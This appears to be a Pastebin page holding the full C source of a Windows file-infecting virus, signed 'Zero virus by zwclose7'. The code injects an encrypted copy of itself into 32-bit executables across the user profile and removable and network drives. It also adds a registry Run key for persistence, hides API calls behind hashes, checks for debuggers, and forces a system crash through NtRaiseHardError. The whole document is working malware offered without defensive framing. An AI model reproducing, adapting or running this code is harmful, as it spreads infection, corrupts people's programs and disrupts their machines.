Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <Windows.h>
- #include <ImageHlp.h>
- #include "ntdll.h"
- #pragma comment(lib,"imagehlp.lib")
- #pragma comment(lib,"ntdll.lib")
- #pragma comment(linker,"/include:__tls_used")
- #pragma section(".CRT$XLB",read)
- #define Align(Value,Alignment) (((Value+Alignment-1)/Alignment)*Alignment)
- #define VIRUS_KEY 0xF4
- #define VIRUS_FLAG ((VIRUS_KEY^0x7FFFFFFF)^0xF0F0F0F0)
- typedef DWORD (WINAPI *pExpandEnvironmentStringsA)(
- LPCSTR lpSrc,
- LPSTR lpDst,
- DWORD nSize
- );
- typedef HANDLE (WINAPI *pCreateFileA)(
- LPCSTR lpFileName,
- DWORD dwDesiredAccess,
- DWORD dwShareMode,
- LPSECURITY_ATTRIBUTES lpSecurityAttributes,
- DWORD dwCreationDisposition,
- DWORD dwFlagsAndAttributes,
- HANDLE hTemplateFile
- );
- typedef BOOL (WINAPI *pWriteFile)(
- HANDLE hFile,
- LPCVOID lpBuffer,
- DWORD nNumberOfBytesToWrite,
- LPDWORD lpNumberOfBytesWritten,
- LPOVERLAPPED lpOverlapped
- );
- typedef LPVOID (WINAPI *pVirtualAlloc)(
- LPVOID lpAddress,
- SIZE_T dwSize,
- DWORD flAllocationType,
- DWORD flProtect
- );
- typedef BOOL (WINAPI *pCloseHandle)(HANDLE Handle);
- typedef BOOL (WINAPI *pVirtualFree)(
- LPVOID lpAddress,
- SIZE_T dwSize,
- DWORD dwFreeType
- );
- typedef BOOL (WINAPI *pCreateProcessA)(
- LPCSTR lpApplicationName,
- LPSTR lpCommandLine,
- LPSECURITY_ATTRIBUTES lpProcessAttributes,
- LPSECURITY_ATTRIBUTES lpThreadAttributes,
- BOOL bInheritHandles,
- DWORD dwCreationFlags,
- LPVOID lpEnvironment,
- LPCSTR lpCurrentDirectory,
- LPSTARTUPINFOA lpStartupInfo,
- LPPROCESS_INFORMATION lpProcessInformation
- );
- typedef enum _HARDERROR_RESPONSE_OPTION
- {
- OptionAbortRetryIgnore,
- OptionOk,
- OptionOkCancel,
- OptionRetryCancel,
- OptionYesNo,
- OptionYesNoCancel,
- OptionShutdownSystem,
- OptionOkNoWait,
- OptionCancelTryContinue
- }HARDERROR_RESPONSE_OPTION;
- typedef enum _HARDERROR_RESPONSE
- {
- ResponseReturnToCaller,
- ResponseNotHandled,
- ResponseAbort,
- ResponseCancel,
- ResponseIgnore,
- ResponseNo,
- ResponseOk,
- ResponseRetry,
- ResponseYes,
- ResponseTryAgain,
- ResponseContinue
- }HARDERROR_RESPONSE;
- extern "C" NTSTATUS NTAPI NtRaiseHardError(
- NTSTATUS ErrorStatus,
- ULONG NumberOfParameters,
- ULONG UnicodeStringParameterMask,
- PULONG_PTR Parameters,
- ULONG ValidResponseOptions,
- PULONG Response
- );
- PVOID VirusFile;
- ULONG VirusSize;
- PIMAGE_SECTION_HEADER WINAPI AddSection(PVOID Image,PSTR SectionName,ULONG SectionSize,ULONG Characteristics)
- {
- PIMAGE_DOS_HEADER pIDH;
- PIMAGE_NT_HEADERS pINH;
- PIMAGE_SECTION_HEADER pISH;
- ULONG i;
- pIDH=(PIMAGE_DOS_HEADER)Image;
- if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
- {
- return NULL;
- }
- pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Image+pIDH->e_lfanew);
- if(pINH->Signature!=IMAGE_NT_SIGNATURE)
- {
- return NULL;
- }
- pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
- i=pINH->FileHeader.NumberOfSections;
- memset(&pISH[i],0,sizeof(IMAGE_SECTION_HEADER));
- pISH[i].Characteristics=Characteristics;
- pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
- pISH[i].VirtualAddress=Align(pISH[i-1].VirtualAddress+pISH[i-1].Misc.VirtualSize,pINH->OptionalHeader.SectionAlignment);
- pISH[i].SizeOfRawData=Align(SectionSize,pINH->OptionalHeader.SectionAlignment);
- pISH[i].Misc.VirtualSize=SectionSize;
- memcpy(pISH[i].Name,SectionName,8);
- pINH->FileHeader.NumberOfSections++;
- pINH->OptionalHeader.SizeOfImage=pISH[i].VirtualAddress+pISH[i].Misc.VirtualSize;
- pINH->OptionalHeader.CheckSum=0;
- return &pISH[i];
- }
- int WINAPI VirusCode()
- {
- PIMAGE_DOS_HEADER pIDH;
- PIMAGE_NT_HEADERS pINH;
- PIMAGE_EXPORT_DIRECTORY pIED;
- PPEB Peb;
- PLDR_DATA_TABLE_ENTRY Ldr;
- PVOID Buffer,Module,Kernel32Base;
- ULONG i,Hash,FileSize,EntryPointRva,VirusRva,write;
- PUCHAR EncryptedVirus,DecryptedVirus,ptr;
- PULONG Function,Name;
- PUSHORT Ordinal;
- FARPROC EntryPoint; // Original entry point
- HANDLE hFile;
- STARTUPINFOA si;
- PROCESS_INFORMATION pi;
- pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
- pCreateFileA fnCreateFileA;
- pWriteFile fnWriteFile;
- pVirtualAlloc fnVirtualAlloc;
- pCloseHandle fnCloseHandle;
- pVirtualFree fnVirtualFree;
- pCreateProcessA fnCreateProcessA;
- char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','.','e','x','e',0},FileName[260];
- __asm
- {
- mov eax,0x41414141
- mov EntryPointRva,eax
- mov eax,0x42424242
- mov VirusRva,eax
- mov eax,0x43434343
- mov FileSize,eax
- }
- Peb=NtCurrentPeb(); // Get the PEB
- Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data
- Module=Ldr->DllBase; // Process executable
- Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
- Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32
- Kernel32Base=Ldr->DllBase; // Store the address of kernel32
- pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
- pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);
- // Get the export directory of kernel32
- pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
- Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
- Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);
- Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);
- // Loop over the function names
- for(i=0;i<pIED->NumberOfNames;i++)
- {
- PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
- ULONG Hash=0;
- // Compute the hash
- while(*ptr)
- {
- Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
- ptr++;
- }
- // Hash of ExpandEnvironmentStringsA
- if(Hash==0x575d1e20)
- {
- fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of CreateFileA
- if(Hash==0xd83eb415)
- {
- fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of WriteFile
- if(Hash==0xa5e7378b)
- {
- fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of VirtualAlloc
- if(Hash==0xa15d96d2)
- {
- fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of CloseHandle
- if(Hash==0x7dfbd342)
- {
- fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of VirtualFree
- if(Hash==0x6f043b69)
- {
- fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- // Hash of CreateProcessA
- if(Hash==0xae3b3c74)
- {
- fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
- }
- }
- EncryptedVirus=(PUCHAR)Module+VirusRva; // Get the virus body
- Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer
- if(Buffer)
- {
- DecryptedVirus=(PUCHAR)Buffer;
- // Decrypt the virus
- for(i=0;i<FileSize;i++)
- {
- DecryptedVirus[i]=EncryptedVirus[i]^VIRUS_KEY;
- }
- fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));
- // Drop the virus in temp folder
- hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
- if(hFile!=INVALID_HANDLE_VALUE)
- {
- // Write the virus to file
- if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
- {
- fnCloseHandle(hFile); // Close the file handle
- fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer
- ptr=(PUCHAR)&si;
- // Zero the structures
- for(i=0;i<sizeof(si);i++)
- {
- ptr[i]=0;
- }
- ptr=(PUCHAR)π
- for(i=0;i<sizeof(pi);i++)
- {
- ptr[i]=0;
- }
- // Run the virus executable
- if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
- {
- fnCloseHandle(pi.hThread);
- fnCloseHandle(pi.hProcess);
- }
- }
- }
- }
- // Call the original entry point
- EntryPoint=(FARPROC)((PUCHAR)Module+EntryPointRva);
- return EntryPoint();
- }
- void WINAPI VirusEnd()
- {
- return;
- }
- BOOL WINAPI IsValidExecutable(HANDLE hFile,PULONG SectionAlignment)
- {
- PIMAGE_DOS_HEADER pIDH;
- PIMAGE_NT_HEADERS pINH;
- PVOID Buffer;
- ULONG FileSize,read;
- FileSize=GetFileSize(hFile,NULL);
- Buffer=VirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
- if(!Buffer)
- {
- return FALSE;
- }
- if(!ReadFile(hFile,Buffer,FileSize,&read,NULL))
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- __try
- {
- pIDH=(PIMAGE_DOS_HEADER)Buffer;
- if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Buffer+pIDH->e_lfanew);
- if(pINH->Signature!=IMAGE_NT_SIGNATURE)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- // Make sure it is 32-bit program
- if(pINH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- if(pINH->FileHeader.Characteristics & IMAGE_FILE_DLL)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- if(pINH->OptionalHeader.LoaderFlags==VIRUS_FLAG)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- if(pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- if(pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_CUI || pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_GUI)
- {
- if(SectionAlignment)
- {
- *SectionAlignment=pINH->OptionalHeader.SectionAlignment;
- }
- VirtualFree(Buffer,0,MEM_RELEASE);
- return TRUE;
- }
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- VirtualFree(Buffer,0,MEM_RELEASE);
- return FALSE;
- }
- void WINAPI InfectFile(PSTR FileName)
- {
- PIMAGE_DOS_HEADER pIDH;
- PIMAGE_NT_HEADERS pINH;
- PIMAGE_SECTION_HEADER pISH;
- HANDLE hFile,hMap;
- PVOID MappedFile;
- ULONG i,FileSize,SectionSize,CodeSize,SectionAlignment,AlignedSize,OldChecksum,NewChecksum;
- PUCHAR CodeAddress,VirusAddress,ptr;
- hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
- if(hFile!=INVALID_HANDLE_VALUE)
- {
- if(!IsValidExecutable(hFile,&SectionAlignment))
- {
- NtClose(hFile);
- return;
- }
- CodeSize=(ULONG)VirusEnd-(ULONG)VirusCode;
- SectionSize=CodeSize+VirusSize;
- FileSize=GetFileSize(hFile,NULL);
- AlignedSize=FileSize+Align(SectionSize,SectionAlignment); // File size need to be aligned. Otherwise the program will not run after infection.
- hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,AlignedSize,NULL);
- if(hMap)
- {
- MappedFile=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);
- if(MappedFile)
- {
- pIDH=(PIMAGE_DOS_HEADER)MappedFile;
- pINH=(PIMAGE_NT_HEADERS)((PUCHAR)MappedFile+pIDH->e_lfanew);
- // Add a new section
- pISH=AddSection(MappedFile,"Zero",SectionSize,IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_EXECUTE);
- if(pISH)
- {
- ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;
- CodeAddress=ptr;
- VirusAddress=CodeAddress+CodeSize;
- memcpy(CodeAddress,VirusCode,CodeSize); // Write the virus code to the file
- memcpy(VirusAddress,VirusFile,VirusSize); // Write the virus body to the file
- // Fill up placeholders
- while(1)
- {
- if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x41414141)
- {
- *(PULONG)(ptr+1)=pINH->OptionalHeader.AddressOfEntryPoint;
- break;
- }
- ptr++;
- }
- ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;
- while(1)
- {
- if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x42424242)
- {
- *(PULONG)(ptr+1)=(ULONG)VirusAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile;
- break;
- }
- ptr++;
- }
- ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;
- while(1)
- {
- if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x43434343)
- {
- *(PULONG)(ptr+1)=VirusSize;
- break;
- }
- ptr++;
- }
- // Encrypt the virus
- for(i=0;i<VirusSize;i++)
- {
- VirusAddress[i]^=VIRUS_KEY;
- }
- pINH->OptionalHeader.AddressOfEntryPoint=(ULONG)CodeAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile; // Set the entry point
- pINH->OptionalHeader.LoaderFlags=VIRUS_FLAG; // Set the infection flag. Since Windows no longer use loader flag, we can use this to store our infection flag.
- if(CheckSumMappedFile(MappedFile,AlignedSize,&OldChecksum,&NewChecksum))
- {
- pINH->OptionalHeader.CheckSum=NewChecksum; // Correct the checksum
- }
- FlushViewOfFile(MappedFile,0); // Flush the changes into file
- UnmapViewOfFile(MappedFile); // Unmap the file
- }
- }
- }
- }
- NtClose(hMap);
- NtClose(hFile);
- }
- void WINAPI SearchFile(PSTR Directory)
- {
- HANDLE hFind;
- WIN32_FIND_DATA FindData;
- char SearchName[1024],FullPath[1024];
- LARGE_INTEGER delay;
- delay.QuadPart=(__int64)-10*10000;
- memset(SearchName,0,sizeof(SearchName));
- memset(&FindData,0,sizeof(WIN32_FIND_DATA));
- sprintf(SearchName,"%s\\*",Directory);
- hFind=FindFirstFile(SearchName,&FindData);
- if(hFind!=INVALID_HANDLE_VALUE)
- {
- while(FindNextFile(hFind,&FindData))
- {
- if(FindData.cFileName[0]=='.')
- {
- continue;
- }
- memset(FullPath,0,sizeof(FullPath));
- sprintf(FullPath,"%s\\%s",Directory,FindData.cFileName);
- if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
- {
- SearchFile(FullPath);
- }
- else
- {
- InfectFile(FullPath);
- }
- NtDelayExecution(FALSE,&delay);
- }
- FindClose(hFind);
- }
- }
- void NTAPI TlsCallback(PVOID Module,ULONG Reason,PVOID Context)
- {
- HKEY hKey;
- char ModulePath[1024],TempPath[60];
- PPEB Peb=NtCurrentPeb();
- ULONG_PTR DebugPort=0;
- if(Reason!=DLL_PROCESS_ATTACH)
- {
- return;
- }
- if(Peb->BeingDebugged)
- {
- NtTerminateProcess(NtCurrentProcess(),0);
- while(1);
- }
- if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
- {
- if(DebugPort)
- {
- NtTerminateProcess(NtCurrentProcess(),0);
- while(1);
- }
- }
- GetModuleFileName(NULL,ModulePath,sizeof(ModulePath));
- ExpandEnvironmentStrings("%temp%\\Zero.exe",TempPath,sizeof(TempPath));
- CopyFile(ModulePath,TempPath,FALSE); // Copy the virus to temp folder
- // Add the virus to registry
- if(!RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
- {
- RegSetValueEx(hKey,"Zero",0,REG_SZ,(PUCHAR)TempPath,sizeof(TempPath));
- RegCloseKey(hKey);
- }
- }
- __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK TlsCallbackAddress[]={TlsCallback,NULL};
- DWORD WINAPI Zero(PVOID p)
- {
- BOOLEAN bl;
- LARGE_INTEGER delay;
- ULONG Response;
- PPEB Peb=NtCurrentPeb();
- ULONG_PTR DebugPort=0;
- delay.QuadPart=(__int64)-10*10000;
- while(1)
- {
- if(Peb->BeingDebugged)
- {
- break;
- }
- if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
- {
- if(DebugPort)
- {
- break;
- }
- }
- NtDelayExecution(FALSE,&delay);
- }
- RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
- NtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);
- while(1);
- }
- DWORD WINAPI InfectUserProfile(PVOID p)
- {
- char UserProfile[1024];
- LARGE_INTEGER delay;
- delay.QuadPart=(__int64)-600000*10000;
- GetEnvironmentVariable("userprofile",UserProfile,sizeof(UserProfile)); // Get the path of user profile
- while(1)
- {
- SearchFile(UserProfile); // Search for files to infect
- NtDelayExecution(FALSE,&delay);
- }
- }
- DWORD WINAPI InfectDrives(PVOID p)
- {
- ULONG DriveType;
- char drives[1024],*str;
- LARGE_INTEGER delay;
- delay.QuadPart=(__int64)-600000*10000;
- while(1)
- {
- memset(drives,0,sizeof(drives));
- GetLogicalDriveStrings(sizeof(drives),drives); // Get all drives
- str=drives;
- while(*str)
- {
- DriveType=GetDriveType(str); // Check the drive type
- // Infect removable and network drives
- if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
- {
- SearchFile(str); // Search for files to infect
- }
- str+=strlen(str)+1; // Get the next drive
- }
- NtDelayExecution(FALSE,&delay);
- }
- }
- int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)
- {
- HANDLE hFile;
- ULONG read,op;
- CreateMutex(NULL,TRUE,"{755842AD-901B-482D-81B3-010C4EB22197}");
- if(GetLastError()==ERROR_ALREADY_EXISTS)
- {
- NtTerminateProcess(NtCurrentProcess(),0);
- while(1);
- }
- hFile=CreateFile(_pgmptr,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
- if(hFile!=INVALID_HANDLE_VALUE)
- {
- VirusSize=GetFileSize(hFile,NULL);
- VirusFile=VirtualAlloc(NULL,VirusSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
- if(VirusFile)
- {
- if(!ReadFile(hFile,VirusFile,VirusSize,&read,NULL))
- {
- NtClose(hFile);
- return -1;
- }
- }
- NtClose(hFile);
- VirtualProtect(VirusFile,VirusSize,PAGE_READONLY,&op); // Protect the virus data
- }
- // Create worker threads
- CreateThread(NULL,0,Zero,NULL,0,NULL);
- CreateThread(NULL,0,InfectUserProfile,NULL,0,NULL);
- CreateThread(NULL,0,InfectDrives,NULL,0,NULL);
- MessageBox(NULL,"You have been owned by Zero virus!","Zero virus by zwclose7",MB_ICONWARNING);
- NtTerminateThread(NtCurrentThread(),0); // Terminate the current thread
- while(1);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement